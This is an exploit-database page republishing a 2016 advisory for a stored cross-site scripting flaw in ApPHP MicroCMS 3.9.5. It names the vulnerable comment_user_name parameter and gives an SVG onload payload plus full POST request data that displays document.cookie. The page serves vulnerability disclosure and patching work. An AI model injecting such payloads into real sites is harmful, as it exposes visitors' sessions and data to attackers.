header-logo
Suggest Exploit
vendor:
MicroCMS
by:
Besim
8,8
CVSS
HIGH
Stored Cross Site Scripting
79
CWE
Product Name: MicroCMS
Affected Version From: 3.9.5
Affected Version To: 3.9.5
Patch Exists: NO
Related CWE: N/A
CPE: a:apphp:microcms:3.9.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2016

ApPHP MicroCMS 3.9.5 – Stored Cross Site Scripting

A stored cross-site scripting vulnerability exists in ApPHP MicroCMS 3.9.5. An attacker can inject malicious JavaScript code into the 'comment_user_name' parameter of the 'index.php?page=posts&post_id=' page, which will be executed in the browser of the victim when the page is viewed.

Mitigation:

Input validation should be used to prevent malicious code from being stored in the application.
Source

Exploit-DB raw data:

# Exploit Title :----------------- : ApPHP MicroCMS 3.9.5 - Stored Cross Site Scripting
# Author :------------------------ : Besim
# Google Dork :---------------- :  -
# Date :-------------------------- : 12/10/2016
# Type :-------------------------- : webapps
# Platform : -------------------- :  PHP  
# Vendor Homepage :------- : http://www.apphp.com
# Software link : -------------- : https://www.apphp.com/customer/index.php?page=free-products

-*-*-*-*-*-*-*-*- Description -*-*-*-*-*-*-*-*-

*-* Vulnerable link : http://site_name/path/index.php?page=pages&pid=

*-* Stored XSS Payload ( Comments ): 

# Vulnerable URL : http://site_name/path/index.php?page=posts&post_id= - Post comment section
# Vuln. Parameter : comment_user_name
# Payload : <svg/onload=prompt(7);//> 


############  POST DATA ############

task=publish_comment &
comment_id=
& article_id=13 
&user_id= 
&token=212529c97855409e56c0e333721461df 
&comment_user_name=<svg/onload=prompt(document.cookie);//> 
&comment_user_email=meryem@yopmai.com 
&comment_text=skdLSJDLKSDKJ 
&captcha_code=w7AG
&btnSubmitPC=Publish your comment

############  ########## ############


*-* Thanks Meryem AKDOĞAN *-*

Navigation

Suggest Exploit

Services By CQR